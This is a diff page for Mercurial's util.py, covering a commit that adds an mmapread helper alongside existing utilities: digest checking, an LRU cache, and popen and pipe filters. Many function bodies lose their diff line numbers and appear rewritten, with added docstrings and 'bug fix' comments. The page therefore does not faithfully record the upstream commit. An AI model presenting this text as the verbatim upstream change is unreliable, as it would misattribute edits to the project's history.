##// END OF EJS Templates
util: add an mmapread method...
Mark Thomas -
r34296:3bb2a9f2 default
parent child Browse files
Show More
@@ -1,3769 +1,3781
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import calendar
20 import calendar
21 import codecs
21 import codecs
22 import collections
22 import collections
23 import contextlib
23 import contextlib
24 import datetime
24 import datetime
25 import errno
25 import errno
26 import gc
26 import gc
27 import hashlib
27 import hashlib
28 import imp
28 import imp
29 import mmap
29 import os
30 import os
30 import platform as pyplatform
31 import platform as pyplatform
31 import re as remod
32 import re as remod
32 import shutil
33 import shutil
33 import signal
34 import signal
34 import socket
35 import socket
35 import stat
36 import stat
36 import string
37 import string
37 import subprocess
38 import subprocess
38 import sys
39 import sys
39 import tempfile
40 import tempfile
40 import textwrap
41 import textwrap
41 import time
42 import time
42 import traceback
43 import traceback
43 import warnings
44 import warnings
44 import zlib
45 import zlib
45
46
46 from . import (
47 from . import (
47 encoding,
48 encoding,
48 error,
49 error,
49 i18n,
50 i18n,
50 policy,
51 policy,
51 pycompat,
52 pycompat,
52 )
53 )
53
54
54 base85 = policy.importmod(r'base85')
55 base85 = policy.importmod(r'base85')
55 osutil = policy.importmod(r'osutil')
56 osutil = policy.importmod(r'osutil')
56 parsers = policy.importmod(r'parsers')
57 parsers = policy.importmod(r'parsers')
57
58
58 b85decode = base85.b85decode
59 b85decode = base85.b85decode
59 b85encode = base85.b85encode
60 b85encode = base85.b85encode
60
61
61 cookielib = pycompat.cookielib
62 cookielib = pycompat.cookielib
62 empty = pycompat.empty
63 empty = pycompat.empty
63 httplib = pycompat.httplib
64 httplib = pycompat.httplib
64 httpserver = pycompat.httpserver
65 httpserver = pycompat.httpserver
65 pickle = pycompat.pickle
66 pickle = pycompat.pickle
66 queue = pycompat.queue
67 queue = pycompat.queue
67 socketserver = pycompat.socketserver
68 socketserver = pycompat.socketserver
68 stderr = pycompat.stderr
69 stderr = pycompat.stderr
69 stdin = pycompat.stdin
70 stdin = pycompat.stdin
70 stdout = pycompat.stdout
71 stdout = pycompat.stdout
71 stringio = pycompat.stringio
72 stringio = pycompat.stringio
72 urlerr = pycompat.urlerr
73 urlerr = pycompat.urlerr
73 urlreq = pycompat.urlreq
74 urlreq = pycompat.urlreq
74 xmlrpclib = pycompat.xmlrpclib
75 xmlrpclib = pycompat.xmlrpclib
75
76
76 # workaround for win32mbcs
77 # workaround for win32mbcs
77 _filenamebytestr = pycompat.bytestr
78 _filenamebytestr = pycompat.bytestr
78
79
def isatty(fp):
    """Report whether *fp* is attached to a terminal.

    Objects lacking a usable isatty() method are treated as non-ttys
    instead of raising.
    """
    try:
        return fp.isatty()
    except AttributeError:
        # not a real file object (or a stub without isatty)
        return False
84
85
85 # glibc determines buffering on first write to stdout - if we replace a TTY
86 # glibc determines buffering on first write to stdout - if we replace a TTY
86 # destined stdout with a pipe destined stdout (e.g. pager), we want line
87 # destined stdout with a pipe destined stdout (e.g. pager), we want line
87 # buffering
88 # buffering
88 if isatty(stdout):
89 if isatty(stdout):
89 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
90 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
90
91
91 if pycompat.osname == 'nt':
92 if pycompat.osname == 'nt':
92 from . import windows as platform
93 from . import windows as platform
93 stdout = platform.winstdout(stdout)
94 stdout = platform.winstdout(stdout)
94 else:
95 else:
95 from . import posix as platform
96 from . import posix as platform
96
97
97 _ = i18n._
98 _ = i18n._
98
99
99 bindunixsocket = platform.bindunixsocket
100 bindunixsocket = platform.bindunixsocket
100 cachestat = platform.cachestat
101 cachestat = platform.cachestat
101 checkexec = platform.checkexec
102 checkexec = platform.checkexec
102 checklink = platform.checklink
103 checklink = platform.checklink
103 copymode = platform.copymode
104 copymode = platform.copymode
104 executablepath = platform.executablepath
105 executablepath = platform.executablepath
105 expandglobs = platform.expandglobs
106 expandglobs = platform.expandglobs
106 explainexit = platform.explainexit
107 explainexit = platform.explainexit
107 findexe = platform.findexe
108 findexe = platform.findexe
108 gethgcmd = platform.gethgcmd
109 gethgcmd = platform.gethgcmd
109 getuser = platform.getuser
110 getuser = platform.getuser
110 getpid = os.getpid
111 getpid = os.getpid
111 groupmembers = platform.groupmembers
112 groupmembers = platform.groupmembers
112 groupname = platform.groupname
113 groupname = platform.groupname
113 hidewindow = platform.hidewindow
114 hidewindow = platform.hidewindow
114 isexec = platform.isexec
115 isexec = platform.isexec
115 isowner = platform.isowner
116 isowner = platform.isowner
116 listdir = osutil.listdir
117 listdir = osutil.listdir
117 localpath = platform.localpath
118 localpath = platform.localpath
118 lookupreg = platform.lookupreg
119 lookupreg = platform.lookupreg
119 makedir = platform.makedir
120 makedir = platform.makedir
120 nlinks = platform.nlinks
121 nlinks = platform.nlinks
121 normpath = platform.normpath
122 normpath = platform.normpath
122 normcase = platform.normcase
123 normcase = platform.normcase
123 normcasespec = platform.normcasespec
124 normcasespec = platform.normcasespec
124 normcasefallback = platform.normcasefallback
125 normcasefallback = platform.normcasefallback
125 openhardlinks = platform.openhardlinks
126 openhardlinks = platform.openhardlinks
126 oslink = platform.oslink
127 oslink = platform.oslink
127 parsepatchoutput = platform.parsepatchoutput
128 parsepatchoutput = platform.parsepatchoutput
128 pconvert = platform.pconvert
129 pconvert = platform.pconvert
129 poll = platform.poll
130 poll = platform.poll
130 popen = platform.popen
131 popen = platform.popen
131 posixfile = platform.posixfile
132 posixfile = platform.posixfile
132 quotecommand = platform.quotecommand
133 quotecommand = platform.quotecommand
133 readpipe = platform.readpipe
134 readpipe = platform.readpipe
134 rename = platform.rename
135 rename = platform.rename
135 removedirs = platform.removedirs
136 removedirs = platform.removedirs
136 samedevice = platform.samedevice
137 samedevice = platform.samedevice
137 samefile = platform.samefile
138 samefile = platform.samefile
138 samestat = platform.samestat
139 samestat = platform.samestat
139 setbinary = platform.setbinary
140 setbinary = platform.setbinary
140 setflags = platform.setflags
141 setflags = platform.setflags
141 setsignalhandler = platform.setsignalhandler
142 setsignalhandler = platform.setsignalhandler
142 shellquote = platform.shellquote
143 shellquote = platform.shellquote
143 spawndetached = platform.spawndetached
144 spawndetached = platform.spawndetached
144 split = platform.split
145 split = platform.split
145 sshargs = platform.sshargs
146 sshargs = platform.sshargs
146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 statisexec = platform.statisexec
148 statisexec = platform.statisexec
148 statislink = platform.statislink
149 statislink = platform.statislink
149 testpid = platform.testpid
150 testpid = platform.testpid
150 umask = platform.umask
151 umask = platform.umask
151 unlink = platform.unlink
152 unlink = platform.unlink
152 username = platform.username
153 username = platform.username
153
154
154 try:
155 try:
155 recvfds = osutil.recvfds
156 recvfds = osutil.recvfds
156 except AttributeError:
157 except AttributeError:
157 pass
158 pass
158 try:
159 try:
159 setprocname = osutil.setprocname
160 setprocname = osutil.setprocname
160 except AttributeError:
161 except AttributeError:
161 pass
162 pass
162
163
163 # Python compatibility
164 # Python compatibility
164
165
165 _notset = object()
166 _notset = object()
166
167
167 # disable Python's problematic floating point timestamps (issue4836)
168 # disable Python's problematic floating point timestamps (issue4836)
168 # (Python hypocritically says you shouldn't change this behavior in
169 # (Python hypocritically says you shouldn't change this behavior in
169 # libraries, and sure enough Mercurial is not a library.)
170 # libraries, and sure enough Mercurial is not a library.)
170 os.stat_float_times(False)
171 os.stat_float_times(False)
171
172
def safehasattr(thing, attr):
    """hasattr() variant that only reports on attribute presence.

    Probes with a private sentinel default so that, unlike Python 2's
    builtin hasattr(), exceptions raised while computing the attribute
    are not silently swallowed.
    """
    probed = getattr(thing, attr, _notset)
    return probed is not _notset
174
175
def bytesinput(fin, fout, *args, **kwargs):
    """Prompt for input via pycompat.rawinput, returning local bytes.

    sys.stdin/sys.stdout are temporarily rebound to str-oriented wrappers
    of *fin*/*fout* so the prompt reads and writes the intended streams;
    the originals are restored no matter what.
    """
    origin, origout = sys.stdin, sys.stdout
    try:
        sys.stdin = encoding.strio(fin)
        sys.stdout = encoding.strio(fout)
        return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
    finally:
        sys.stdin, sys.stdout = origin, origout
182
183
def bitsfrom(container):
    """Return the bitwise OR of every value in *container* (0 if empty)."""
    mask = 0
    for flag in container:
        mask |= flag
    return mask
188
189
189 # python 2.6 still have deprecation warning enabled by default. We do not want
190 # python 2.6 still have deprecation warning enabled by default. We do not want
190 # to display anything to standard user so detect if we are running test and
191 # to display anything to standard user so detect if we are running test and
191 # only use python deprecation warning in this case.
192 # only use python deprecation warning in this case.
192 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
193 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
193 if _dowarn:
194 if _dowarn:
194 # explicitly unfilter our warning for python 2.7
195 # explicitly unfilter our warning for python 2.7
195 #
196 #
196 # The option of setting PYTHONWARNINGS in the test runner was investigated.
197 # The option of setting PYTHONWARNINGS in the test runner was investigated.
197 # However, module name set through PYTHONWARNINGS was exactly matched, so
198 # However, module name set through PYTHONWARNINGS was exactly matched, so
198 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
199 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
199 # makes the whole PYTHONWARNINGS thing useless for our usecase.
200 # makes the whole PYTHONWARNINGS thing useless for our usecase.
200 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
201 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
201 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
202 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
202 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
203 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
203
204
def nouideprecwarn(msg, version, stacklevel=1):
    """Issue an python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if not _dowarn:
        return
    hint = ("\n(compatibility will be dropped after Mercurial-%s,"
            " update your code.)") % version
    # +1 so the warning points at our caller, not this helper
    warnings.warn(msg + hint, DeprecationWarning, stacklevel + 1)
213
214
# digest name -> hashlib constructor
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

# sanity check: every preference entry must be constructible
for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS
224
225
class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        """Feed *data* to every tracked digest."""
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            # Bug fix: the original interpolated a stale module-level 'k'
            # here instead of 'key', reporting the wrong (or an undefined)
            # name in the error message.
            raise Abort(_('unknown digest type: %s') % key)
        return self._hashes[key].hexdigest()

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
271
272
class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

    d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size            # expected total byte count
        self._got = 0                # bytes seen so far
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        """Read from the wrapped handle, feeding the digests as we go."""
        data = self._fh.read(length)
        self._digester.update(data)
        self._got += len(data)
        return data

    def validate(self):
        """Abort unless the byte count and every expected digest match."""
        if self._got != self._size:
            raise Abort(_('size mismatch: expected %d, got %d') %
                        (self._size, self._got))
        for name, expected in self._digests.items():
            actual = self._digester[name]
            if expected != actual:
                # i18n: first parameter is a digest name
                raise Abort(_('%s mismatch: expected %s, got %s') %
                            (name, expected, actual))
303
304
try:
    buffer = buffer
except NameError:
    # Python 3 dropped the buffer() builtin; emulate it with zero-copy
    # memoryview slices.
    def buffer(sliceable, offset=0, length=None):
        view = memoryview(sliceable)
        if length is None:
            return view[offset:]
        return view[offset:offset + length]
311
312
# On POSIX it is safe (and desirable) to close inherited descriptors in
# children spawned by the popen helpers below.
closefds = pycompat.osname == 'posix'

# bytes pulled per low-level os.read() in bufferedinputpipe._fillbuffer
_chunksize = 4096
315
316
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class let us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """

    def __init__(self, input):
        self._input = input
        self._buffer = []    # pending chunks, oldest first
        self._eof = False    # set once the underlying fd reports EOF
        self._lenbuf = 0     # total number of buffered bytes

    @property
    def hasbuffer(self):
        """True is any data is currently buffered

        This will be used externally a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        # pull from the pipe until the request can be satisfied or EOF
        while not self._eof and self._lenbuf < size:
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        if len(self._buffer) > 1:
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while not self._eof and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0:  # end of file
            size = self._lenbuf
        elif len(self._buffer) > 1:
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        joined = self._buffer[0]
        if len(self._buffer) > 1:
            joined = ''.join(self._buffer)

        data = joined[:size]
        leftover = joined[len(data):]
        if leftover:
            self._buffer = [leftover]
            self._lenbuf = len(leftover)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        chunk = os.read(self._input.fileno(), _chunksize)
        if not chunk:
            self._eof = True
        else:
            self._lenbuf += len(chunk)
            self._buffer.append(chunk)
409
410
def mmapread(fp):
    """Return a read-only memory map of *fp*'s contents.

    fp may be a file-like object providing fileno() or a raw file
    descriptor.  Returns an mmap object, or '' for an empty file (which
    mmap.mmap() refuses to map).
    """
    # Resolve the descriptor before entering the try block: the original
    # assigned fd inside it, so a ValueError raised by fp.fileno() (e.g. on
    # a closed file) made the handler hit an unbound 'fd' and surface as
    # UnboundLocalError instead of the real error.
    fd = getattr(fp, 'fileno', lambda: fp)()
    try:
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise
421
def popen2(cmd, env=None, newlines=False):
    """Spawn *cmd* through the shell; return its (stdin, stdout) pipes."""
    # Setting bufsize to -1 lets the system decide the buffer size.
    # The default for bufsize is 0, meaning unbuffered. This leads to
    # poor performance on Mac OS X: http://bugs.python.org/issue4194
    proc = subprocess.Popen(cmd, shell=True, bufsize=-1,
                            close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout
420
432
def popen3(cmd, env=None, newlines=False):
    """Like popen4(), but drop the process handle; return the three pipes."""
    stdin, stdout, stderr, _proc = popen4(cmd, env, newlines)
    return stdin, stdout, stderr
424
436
def popen4(cmd, env=None, newlines=False, bufsize=-1):
    """Spawn *cmd* through the shell with all three streams piped.

    Returns (stdin, stdout, stderr, proc).
    """
    proc = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
                            close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout, proc.stderr, proc
433
445
def version():
    """Return version information if available."""
    try:
        from . import __version__
    except ImportError:
        # no generated version module (e.g. running from a raw checkout)
        return 'unknown'
    return __version__.version
441
453
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    # Raw string fixes the invalid '\+' escape of the original, which
    # produces Deprecation/SyntaxWarning on modern Pythons; the matched
    # pattern (literal '+' or '-') is unchanged.
    parts = remod.split(r'[\+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            # stop at the first non-numeric component (e.g. 'rc')
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
510
522
# used by parsedate -- tried in order, so more specific formats come first
defaultdateformats = (
    '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
    '%Y-%m-%dT%H:%M',    # without seconds
    '%Y-%m-%dT%H%M%S',   # another awful but legal variant without :
    '%Y-%m-%dT%H%M',     # without seconds
    '%Y-%m-%d %H:%M:%S', # our common legal variant
    '%Y-%m-%d %H:%M',    # without seconds
    '%Y-%m-%d %H%M%S',   # without :
    '%Y-%m-%d %H%M',     # without seconds
    '%Y-%m-%d %I:%M:%S%p',
    '%Y-%m-%d %H:%M',
    '%Y-%m-%d %I:%M%p',
    '%Y-%m-%d',
    '%m-%d',
    '%m/%d',
    '%m/%d/%y',
    '%m/%d/%Y',
    '%a %b %d %H:%M:%S %Y',
    '%a %b %d %I:%M:%S%p %Y',
    '%a, %d %b %Y %H:%M:%S', #  GNU coreutils "/bin/date --rfc-2822"
    '%b %d %H:%M:%S %Y',
    '%b %d %I:%M:%S%p %Y',
    '%b %d %H:%M:%S',
    '%b %d %I:%M:%S%p',
    '%b %d %H:%M',
    '%b %d %I:%M%p',
    '%b %d %Y',
    '%b %d',
    '%H:%M:%S',
    '%I:%M:%S%p',
    '%H:%M',
    '%I:%M%p',
)

# coarser formats accepted only where an extended range makes sense
extendeddateformats = defaultdateformats + (
    "%Y",
    "%Y-%m",
    "%b",
    "%b %Y",
    )
552
564
def cachefunc(func):
    '''cache the result of function calls

    Returns a wrapper that remembers every result of ``func`` and replays
    it on repeated calls with the same positional arguments.
    '''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount
    if argcount == 0:
        memo = []
        def f():
            if not memo:
                memo.append(func())
            return memo[0]
        return f
    memo = {}
    if argcount == 1:
        # single-argument fast path: the argument itself is the cache key,
        # avoiding tuple packing/unpacking on every call
        def f(arg):
            try:
                return memo[arg]
            except KeyError:
                memo[arg] = func(arg)
                return memo[arg]
    else:
        def f(*args):
            try:
                return memo[args]
            except KeyError:
                memo[args] = func(*args)
                return memo[args]

    return f
578
590
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    Keys are kept in insertion order; re-setting an existing key moves it
    to the end ("last-set" order).

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # delete first so the key is re-inserted at the end of the order
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v
603
615
class transactional(object):
    """Base class turning a transaction-like type into a context manager.

    Subclasses provide close() and release(); the ``with`` protocol then
    guarantees release() always runs, while close() runs only on success.
    """
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, exctb):
        try:
            # only commit when the body finished without raising
            if exctype is None:
                self.close()
        finally:
            # always end the transaction; if close() was skipped above,
            # release() aborts it
            self.release()
628
640
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        # InterventionRequired is an expected stop, not a failure: commit
        # the transaction before propagating it
        tr.close()
        raise
    finally:
        # any other exception falls through with the transaction unclosed,
        # so release() aborts it
        tr.release()
646
658
@contextlib.contextmanager
def nullcontextmanager():
    # no-op context manager: useful as a placeholder where a "with"
    # statement is syntactically required
    yield
650
662
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    # __slots__ keeps per-node memory small; caches may hold many nodes
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        self.next = None
        self.prev = None

        # the _notset sentinel marks a node that holds no entry yet
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        # key -> _lrucachenode, for O(1) lookup
        self._cache = {}

        # circular doubly-linked list; starts as a single empty node
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1          # number of allocated nodes (grows up to max)
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        # a read counts as a use: promote the node to most-recent
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        # NB: unlike __getitem__, get() does not refresh the entry's recency
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        # walk the ring from the head, emptying nodes until we hit one that
        # is already empty (nodes stay allocated for reuse)
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node
828
840
def lrucachefunc(func):
    '''cache most recent results of function calls

    Keeps roughly the 20 most recently used results; older entries are
    evicted as new ones arrive.
    '''
    results = {}
    recency = collections.deque()  # oldest key sits at the left end
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg in results:
                # refresh: pull the key out so it can be re-appended as newest
                recency.remove(arg)
            else:
                if len(results) > 20:
                    del results[recency.popleft()]
                results[arg] = func(arg)
            recency.append(arg)
            return results[arg]
    else:
        def f(*args):
            if args in results:
                recency.remove(args)
            else:
                if len(results) > 20:
                    del results[recency.popleft()]
                results[args] = func(*args)
            recency.append(args)
            return results[args]

    return f
855
867
class propertycache(object):
    """Descriptor that caches the wrapped function's result on the instance.

    The first access computes the value and stores it in the instance's
    __dict__ under the function's name, so later lookups bypass the
    descriptor entirely.
    """

    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
868
880
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    # stderr is not captured: it is inherited from the parent process,
    # so perr below is always None
    p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    pout, perr = p.communicate(s)
    return pout
875
887
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname, outname = None, None
    try:
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, pycompat.sysstr('wb'))
        fp.write(s)
        fp.close()
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        # only the name is needed; the command itself writes OUTFILE
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
